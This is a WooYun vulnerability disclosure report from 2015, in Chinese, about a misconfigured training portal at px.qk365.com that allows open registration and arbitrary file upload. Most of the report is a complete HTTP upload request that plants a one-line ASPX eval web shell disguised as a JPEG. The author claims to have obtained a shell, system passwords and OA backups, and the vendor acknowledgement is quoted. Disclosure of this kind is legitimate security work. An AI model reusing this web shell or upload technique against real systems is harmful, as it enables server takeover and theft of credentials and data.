乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-05: 细节已通知厂商并且等待厂商处理中 2015-11-05: 厂商已经确认,细节仅向厂商公开 2015-11-15: 细节向核心白帽子及相关领域专家公开 2015-11-25: 细节向普通白帽子公开 2015-12-05: 细节向实习白帽子公开 2015-12-20: 细节向公众公开
青客某系统配置不当导致getshell
http://px.qk365.com/default.aspx
可以任意注册账号 admin123/admin123
可任意上传文件
POST /PXSystem/User_Info_Manage.aspx HTTP/1.1Host: px.qk365.comProxy-Connection: keep-aliveContent-Length: 3113Cache-Control: max-age=0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Origin: http://px.qk365.comUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryd5rPHJR88c1TPeJSReferer: http://px.qk365.com/PXSystem/User_Info_Manage.aspxAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.8Cookie: ASP.NET_SessionId=he4igfacdfmdg4jdllh0vq55------WebKitFormBoundaryd5rPHJR88c1TPeJSContent-Disposition: form-data; name="__VIEWSTATE"/wEPDwUKLTg5NDY5Njk3Ng9kFgICAw8WAh4HZW5jdHlwZQUTbXVsdGlwYXJ0L2Zvcm0tZGF0YRYSAgEPDxYCHgRUZXh0BQhhZG1pbjEyM2RkAgMPDxYCHwEFDOaZrumAmuWtpuWRmGRkAgUPDxYCHwEFBiZuYnNwO2RkAgcPDxYCHwEFD+aIv+S4nOWFs+ezu+e7hGRkAgkPDxYCHwEFBuebkeeuoWRkAgsPDxYCHwEFCjIwMTUtMTEtMDVkZAInDw8WAh8BZWRkAi0PDxYEHghJbWFnZVVybAU4Li4vVXBsb2FkL1BYU3lzdGVtL2RlZmF1bHQvMTQ5OC8yMDE1MTEwNTA1MDYzMjcxNTI1LmFzcHgeB1Zpc2libGVnZGQCLw8PFgIfA2hkZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQULQXV0b1JlbmFtZTJy2ddlS6o5n09SxDcUtUH6TJAt0Q==------WebKitFormBoundaryd5rPHJR88c1TPeJSContent-Disposition: form-data; name="STU_NICKNAME"admin------WebKitFormBoundaryd5rPHJR88c1TPeJSContent-Disposition: form-data; name="STU_SEX"ç·------WebKitFormBoundaryd5rPHJR88c1TPeJSContent-Disposition: form-data; name="STU_CNNAME"admin------WebKitFormBoundaryd5rPHJR88c1TPeJSContent-Disposition: form-data; name="STU_ENNAME"admin------WebKitFormBoundaryd5rPHJR88c1TPeJSContent-Disposition: form-data; name="STU_PHONE"------WebKitFormBoundaryd5rPHJR88c1TPeJSContent-Disposition: form-data; name="STU_MOBILE"------WebKitFormBoundaryd5rPHJR88c1TPeJSContent-Disposition: form-data; name="STU_EMAIL"------WebKitFormBoundaryd5rPHJR88c1TPeJSContent-Disposition: form-data; name="STU_CONTACT"------WebKitFormBoundaryd5rPHJR88c1TPeJSContent-Disposition: form-data; name="STU_EDU"å¦å£«------WebKitFormBoundaryd5rPHJR88c1TPeJSContent-Disposition: form-data; name="STU_ADDRESS"------WebKitFormBoundaryd5rPHJR88c1TPeJSContent-Disposition: form-data; name="STU_POST"------WebKitFormBoundaryd5rPHJR88c1TPeJSContent-Disposition: form-data; name="ACCOUNT_FACE"-1------WebKitFormBoundaryd5rPHJR88c1TPeJSContent-Disposition: form-data; name="ACCOUNT_CARD"------WebKitFormBoundaryd5rPHJR88c1TPeJSContent-Disposition: form-data; name="UploadLocalFile"; filename="12.jpg"Content-Type: image/jpeg<%@ Page Language=¡±Jscript¡±%><%eval(Request.Item["qwert"],¡±unsafe¡±);%>------WebKitFormBoundaryd5rPHJR88c1TPeJSContent-Disposition: form-data; name="UploadLocalFile2"; filename=""Content-Type: application/octet-stream------WebKitFormBoundaryd5rPHJR88c1TPeJSContent-Disposition: form-data; name="AutoRename2"on------WebKitFormBoundaryd5rPHJR88c1TPeJSContent-Disposition: form-data; name="saveInfo"ä¿åæ°æ®------WebKitFormBoundaryd5rPHJR88c1TPeJSContent-Disposition: form-data; name="PICTURE_MODE"HW------WebKitFormBoundaryd5rPHJR88c1TPeJSContent-Disposition: form-data; name="PICTURE_WIDTH"100------WebKitFormBoundaryd5rPHJR88c1TPeJSContent-Disposition: form-data; name="PICTURE_HEIGHT"120------WebKitFormBoundaryd5rPHJR88c1TPeJSContent-Disposition: form-data; name="IMAGE_MODE"HW------WebKitFormBoundaryd5rPHJR88c1TPeJSContent-Disposition: form-data; name="IMAGE_WIDTH"100------WebKitFormBoundaryd5rPHJR88c1TPeJSContent-Disposition: form-data; name="IMAGE_HEIGHT"100------WebKitFormBoundaryd5rPHJR88c1TPeJS--
已shell
系统密码
OA系统备份
危害等级:中
漏洞Rank:10
确认时间:2015-11-05 18:30
非常感谢你帮我们系统安全检测出漏洞,我们将重视这个问题,并立即进行整改。
暂无